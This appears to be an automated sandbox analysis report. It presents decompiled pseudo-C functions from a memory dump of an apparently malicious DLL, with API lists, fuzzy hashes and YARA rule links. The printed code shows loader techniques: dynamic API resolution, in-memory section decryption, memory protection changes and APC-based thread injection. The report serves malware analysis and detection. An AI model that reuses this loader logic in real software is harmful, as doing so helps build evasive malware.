API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: c2d07a39bf386c3431f84039e335c52385009c330abdacac68fbafda5499f603
Instruction ID: 1380fcbca737d31d1b952141a5e849347a26401cc7339beb98dbea9ec30ea781
Opcode Fuzzy Hash: c2d07a39bf386c3431f84039e335c52385009c330abdacac68fbafda5499f603
Instruction Fuzzy Hash: BC31C671B14B019BC750DFF58C4C99F77FDAF96354B22492AF8A4C2140EB70C489A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E1B1B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e1b41d0 + 0x6e1b5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e1b41d0 + 0x6e1b50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E1B142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e1b41d0 + 0x6e1b50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e1b41d0 + 0x6e1b5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e1b41d0 + 0x6e1b5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e1b41d0 + 0x6e1b512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E1B1B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e1b106e
0x6e1b1072
0x6e1b1133
0x6e1b1078
0x6e1b1090
0x6e1b109f
0x6e1b10a6
0x6e1b10aa
0x6e1b10ad
0x6e1b112b
0x6e1b112c
0x6e1b10af
0x6e1b10bc
0x6e1b10c0
0x6e1b10c3
0x00000000
0x6e1b10c5
0x6e1b10d2
0x6e1b10d6
0x6e1b10d9
0x00000000
0x6e1b10db
0x6e1b10e8
0x6e1b10ec
0x6e1b10ef
0x00000000
0x6e1b10f1
0x6e1b10fe
0x6e1b1102
0x6e1b1105
0x00000000
0x6e1b1107
0x6e1b110d
0x6e1b1113
0x6e1b1118
0x6e1b111f
0x6e1b1122
0x00000000
0x6e1b1124
0x6e1b1127
0x6e1b1127
0x6e1b1122
0x6e1b1105
0x6e1b10ef
0x6e1b10d9
0x6e1b10c3
0x6e1b10ad
0x6e1b1141

APIs

Part of subcall function 6E1B1B58: HeapAlloc.KERNEL32(00000000,?,6E1B1702,?,00000000,00000000,?,?,?,6E1B1CE6), ref: 6E1B1B64

GetModuleHandleA.KERNEL32(?,00000020), ref: 6E1B1084
GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10A6
GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10BC
GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10D2
GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10E8
GetProcAddress.KERNEL32(00000000,?), ref: 6E1B10FE

Part of subcall function 6E1B1B9C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 6E1B1BF9
Part of subcall function 6E1B1B9C: memset.NTDLL ref: 6E1B1C1B

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 2065c521c80a73fe13efc1034e8ed8a82e6b570bb8d2baeaaed9358f1b76c9b0
Instruction ID: 8cf69eb4dd2d7ae885f3ff2c7afa61a849f0d3b067807fe1bbb52cb7f6f6ae5e
Opcode Fuzzy Hash: 2065c521c80a73fe13efc1034e8ed8a82e6b570bb8d2baeaaed9358f1b76c9b0
Instruction Fuzzy Hash: B32132F1A0060AAFDB50EFA9DC80D9A7BFCFF55244B128515E945D7201E730E946ABB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e1b4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e1b418c;
						if( *0x6e1b418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e1b4198;
								if( *0x6e1b4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e1b418c);
						}
						HeapDestroy( *0x6e1b4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e1b4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6e1b4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e1b41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E1B13D1(E6E1B20CE, E6E1B121C(_a12, 1, 0x6e1b4198, _t41));
							 *0x6e1b418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x6e1b1db1
0x6e1b1dbd
0x6e1b1dbf
0x6e1b1dc2
0x6e1b1e38
0x6e1b1e3e
0x6e1b1e40
0x6e1b1e42
0x6e1b1e48
0x6e1b1e4a
0x6e1b1e4f
0x6e1b1e52
0x6e1b1e5d
0x6e1b1e5f
0x00000000
0x00000000
0x6e1b1e61
0x6e1b1e64
0x6e1b1e66
0x00000000
0x00000000
0x00000000
0x6e1b1e66
0x6e1b1e6e
0x6e1b1e6e
0x6e1b1e7a
0x6e1b1e7a
0x6e1b1dc4
0x6e1b1dc5
0x6e1b1de5
0x6e1b1deb
0x6e1b1ded
0x6e1b1df2
0x6e1b1e2e
0x6e1b1e2e
0x6e1b1df4
0x6e1b1dfc
0x6e1b1e03
0x6e1b1e0d
0x6e1b1e19
0x6e1b1e20
0x6e1b1e25
0x6e1b1e2a
0x00000000
0x6e1b1e2a
0x6e1b1e25
0x6e1b1df2
0x6e1b1dc5
0x6e1b1e87

APIs

InterlockedIncrement.KERNEL32(6E1B4188), ref: 6E1B1DD0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E1B1DE5

Part of subcall function 6E1B13D1: CreateThread.KERNELBASE ref: 6E1B13E8
Part of subcall function 6E1B13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1B13FD
Part of subcall function 6E1B13D1: GetLastError.KERNEL32(00000000), ref: 6E1B1408
Part of subcall function 6E1B13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6E1B1412
Part of subcall function 6E1B13D1: CloseHandle.KERNEL32(00000000), ref: 6E1B1419
Part of subcall function 6E1B13D1: SetLastError.KERNEL32(00000000), ref: 6E1B1422

InterlockedDecrement.KERNEL32(6E1B4188), ref: 6E1B1E38
SleepEx.KERNEL32(00000064,00000001), ref: 6E1B1E52
CloseHandle.KERNEL32 ref: 6E1B1E6E
HeapDestroy.KERNEL32 ref: 6E1B1E7A

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: e58c86ada123612b30a755e928923fe484272813baf452446bc444cf2ace4708
Instruction ID: 95c50dda7302726b752ae8c09e6697451d4d926c40bac34937551fc851a1050e
Opcode Fuzzy Hash: e58c86ada123612b30a755e928923fe484272813baf452446bc444cf2ace4708
Instruction Fuzzy Hash: A8218E35F00605ABDF019FE9CC88A4E7BB9EF667607228529F505D3140E770A99AFB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B13D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B13D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e1b41cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e1b13e8
0x6e1b13ee
0x6e1b13f2
0x6e1b13fd
0x6e1b1405
0x6e1b140e
0x6e1b1412
0x6e1b1419
0x6e1b1420
0x6e1b1422
0x6e1b1428
0x6e1b1405
0x6e1b142c

APIs

CreateThread.KERNELBASE ref: 6E1B13E8
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E1B13FD
GetLastError.KERNEL32(00000000), ref: 6E1B1408
TerminateThread.KERNEL32(00000000,00000000), ref: 6E1B1412
CloseHandle.KERNEL32(00000000), ref: 6E1B1419
SetLastError.KERNEL32(00000000), ref: 6E1B1422

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 549f2aa28b35eadece1de0aeddba6f542ffde2fc1f20d692eea5961ecfe59e9d
Instruction ID: e7100d7229b804fbd6de8ee5e2e2ae35698a614df3f4aefa4ec2f68df8e9a480
Opcode Fuzzy Hash: 549f2aa28b35eadece1de0aeddba6f542ffde2fc1f20d692eea5961ecfe59e9d
Instruction Fuzzy Hash: 94F08532A08E21BBDB221BA48C0CF8FBB68FF0A711F01C504F60995140C7B18862BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B18AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E1B18AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6e1b41b0;
				_t50 = E6E1B1000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6e1b41cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6e1b5137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6e1b41cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6e1b18b4
0x6e1b18c4
0x6e1b18cb
0x6e1b18ce
0x6e1b18e3
0x6e1b18ea
0x6e1b18ef
0x6e1b1900
0x6e1b1903
0x6e1b1909
0x6e1b190d
0x6e1b1910
0x6e1b19ec
0x6e1b1916
0x6e1b1916
0x6e1b191a
0x6e1b19b2
0x6e1b1920
0x6e1b1921
0x6e1b1926
0x6e1b1929
0x6e1b192c
0x6e1b192c
0x6e1b1933
0x6e1b1936
0x6e1b193e
0x6e1b193f
0x6e1b1940
0x6e1b1947
0x6e1b194b
0x6e1b1951
0x6e1b1955
0x6e1b1957
0x6e1b195b
0x6e1b195e
0x6e1b1965
0x6e1b1968
0x6e1b196d
0x6e1b1970
0x6e1b1986
0x6e1b1972
0x6e1b197c
0x6e1b197e
0x6e1b1981
0x6e1b1981
0x6e1b198d
0x6e1b198d
0x6e1b198d
0x6e1b1965
0x6e1b1998
0x6e1b199b
0x6e1b199e
0x6e1b19a7
0x6e1b19a7
0x6e1b19af
0x6e1b19be
0x6e1b19d3
0x6e1b19c0
0x6e1b19c9
0x6e1b19ce
0x6e1b19e4
0x6e1b19e4
0x6e1b19f3
0x6e1b19f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1B1903
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1B19C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1B19E4

Strings

Jun 6 2021, xrefs: 6E1B1936

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 6 2021
API String ID: 4010158826-1013970402
Opcode ID: 381d2662618b1b762ecee7beb771fe3ce76711f98602692b1d729f501619b9e3
Instruction ID: f948e7b6940429a321c27a6a9e372456abced773a724a2eeecd5401695c2f6d8
Opcode Fuzzy Hash: 381d2662618b1b762ecee7beb771fe3ce76711f98602692b1d729f501619b9e3
Instruction Fuzzy Hash: 60413E71E0021AAFDB04CFD9C884ADEBBB5BF49310F258129D905B7244D775AA4ADB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B20CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1B20CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E1B1C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e1b20d7
0x6e1b20dc
0x6e1b20ea
0x6e1b20ef
0x6e1b20ef
0x6e1b20f5
0x6e1b20fa
0x6e1b20fe
0x6e1b2102
0x6e1b2102
0x6e1b210c
0x6e1b2115

APIs

GetCurrentThread.KERNEL32 ref: 6E1B20D1
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1B20DC
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1B20EF
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1B2102

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 1445b098277938d68b84eece7790d88b9cddc84a4300db05baf2003321feb79f
Instruction ID: 02a3ff2c62c61bdc72047b1060b17f5cae0b749c701fd01ee73598003f2eb522
Opcode Fuzzy Hash: 1445b098277938d68b84eece7790d88b9cddc84a4300db05baf2003321feb79f
Instruction Fuzzy Hash: 96E09231709A112B96016B698CC8EAFAB5CDF963307124235F524D21D0DBA49C5BA6A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1B126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e1b41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e1b1277
0x6e1b1284
0x6e1b128a
0x6e1b1296
0x6e1b12a6
0x6e1b12a8
0x6e1b12b0
0x6e1b1345
0x6e1b134c
0x00000000
0x00000000
0x00000000
0x6e1b12b6
0x6e1b12b6
0x6e1b12b6
0x6e1b12ba
0x00000000
0x00000000
0x6e1b12c6
0x6e1b12ca
0x6e1b12ee
0x6e1b12f2
0x6e1b1306
0x6e1b1306
0x6e1b130c
0x6e1b131b
0x6e1b131f
0x6e1b1327
0x6e1b1327
0x6e1b132f
0x6e1b1332
0x6e1b133f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1b133f
0x6e1b12fa
0x6e1b12fe
0x6e1b1304
0x00000000
0x00000000
0x00000000
0x6e1b1304
0x6e1b12d2
0x6e1b12d6
0x6e1b12e0
0x6e1b12d8
0x6e1b12d8
0x6e1b12d8
0x00000000
0x6e1b12d6
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1B12A6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1B131B
GetLastError.KERNEL32 ref: 6E1B1321

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 4d141be1d3fda716f5634941a94c03daee59206472068c2941ebd0bdde93d7d7
Instruction ID: cea6f38f7e97ec2417d4fb8246df625d2b13d414542be4c8cf67b02333625b29
Opcode Fuzzy Hash: 4d141be1d3fda716f5634941a94c03daee59206472068c2941ebd0bdde93d7d7
Instruction Fuzzy Hash: FC219131A0020ADFCB14CF95C485AAAF7F5FF08319F11885AD10297594F3B8A699DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B14E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E1B14E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6e1b41c4);
				_push(1);
				_push( *0x6e1b41d0 + 0x6e1b5089);
				 *0x6e1b41c0 = 0xc;
				 *0x6e1b41c8 = 0; // executed
				L6E1B1DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6E1B1697( &_v44,  &_v28,  *0x6e1b41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6e1b41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6E1B1144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6e1b41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6E1B2118(_t40, _t30 + 4);
					}
				}
				_t23 = E6E1B1444(_v44); // executed
				goto L7;
			}

0x6e1b14fa
0x6e1b14fb
0x6e1b1500
0x6e1b1508
0x6e1b1509
0x6e1b1513
0x6e1b1519
0x6e1b1522
0x6e1b1527
0x6e1b1545
0x6e1b159a
0x6e1b159b
0x6e1b159c
0x6e1b159c
0x6e1b154d
0x6e1b1553
0x6e1b1561
0x6e1b1565
0x6e1b156c
0x6e1b1574
0x6e1b1578
0x6e1b157a
0x6e1b1589
0x6e1b157c
0x6e1b1582
0x6e1b1582
0x6e1b157a
0x6e1b1591
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E1B41C4,00000000), ref: 6E1B1519
lstrlenW.KERNEL32(?,?,?), ref: 6E1B154D

Part of subcall function 6E1B1144: GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E1B1151
Part of subcall function 6E1B1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1B1167
Part of subcall function 6E1B1144: _snwprintf.NTDLL ref: 6E1B118C
Part of subcall function 6E1B1144: CreateFileMappingW.KERNELBASE(000000FF,6E1B41C0,00000004,00000000,?,?), ref: 6E1B11B1
Part of subcall function 6E1B1144: GetLastError.KERNEL32 ref: 6E1B11C8
Part of subcall function 6E1B1144: CloseHandle.KERNEL32(00000000), ref: 6E1B11FD

ExitThread.KERNEL32 ref: 6E1B159C

Memory Dump Source

Source File: 00000001.00000002.473919285.000000006E1B1000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: true

Associated: 00000001.00000002.473904553.000000006E1B0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473937407.000000006E1B3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.473949206.000000006E1B5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.473959359.000000006E1B6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 6fadc3372fa8c2fc4f35288ed3ff1369b0db524ac88bd6eb6ee8c076dd32d9f0
Instruction ID: ff87c3f60311304039fff71a0e828add78be85f701275ccf42638e81072073af
Opcode Fuzzy Hash: 6fadc3372fa8c2fc4f35288ed3ff1369b0db524ac88bd6eb6ee8c076dd32d9f0
Instruction Fuzzy Hash: 9511BFB2A04705AFDB00CFA4CC48E8B7BECBF5A744F128916F555DB140E730E589AB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DA0B4, Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6E1DA100
GetFileType.KERNELBASE(00000000), ref: 6E1DA112

Memory Dump Source

Source File: 00000001.00000002.474006884.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 9a89a9377a6998413a676051b104efcdd7da544899c646b029c3f579652228d5
Instruction ID: 75377a20c72be7eeaaaaacb260462cc1d30b9ae30e73b46f5c181b8e5b666fa4
Opcode Fuzzy Hash: 9a89a9377a6998413a676051b104efcdd7da544899c646b029c3f579652228d5
Instruction Fuzzy Hash: 2611B7722447528ADB70CDBE8C986167AA59763330B340F19D1B5C62F1D630E4CEE211

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B1ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E1B1ADB(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6E1B1697( &_v8,  &_v12,  *0x6e1b41cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6E1B2087(_t22, _v8,  *0x6e1b41cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6E1B1E8A(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6e1b4190, 0, _v8);
				}
				return _t25;
			}

0x6e1b1adb
0x6e1b1ade
0x6e1b1adf
0x6e1b1af5
0x6e1b1afe
0x6e1b1b03
0x6e1b1b1c
0x6e1b1b05
0x6e1b1b18
0x6e1b1b18
0x6e1b1b20
0x6e1b1b22
0x6e1b1b2a
0x6e1b1b32
0x6e1b1b3a
0x6e1b1b3c
0x6e1b1b3c
0x6e1b1b3a
0x6e1b1b4c
0x6e1b1b4c
0x6e1b1b57

APIs

StrStrIA.KERNELBASE(00000000,6E1B1CE6,?,6E1B1CE6,?,00000000,00000000,?,?,?,6E1B1CE6), ref: 6E1B1B32
HeapFree.KERNEL32(00000000,?,?,6E1B1CE6,?,00000000,00000000,?,?,?,6E1B1CE6), ref: 6E1B1B4C

Memory Dump Source

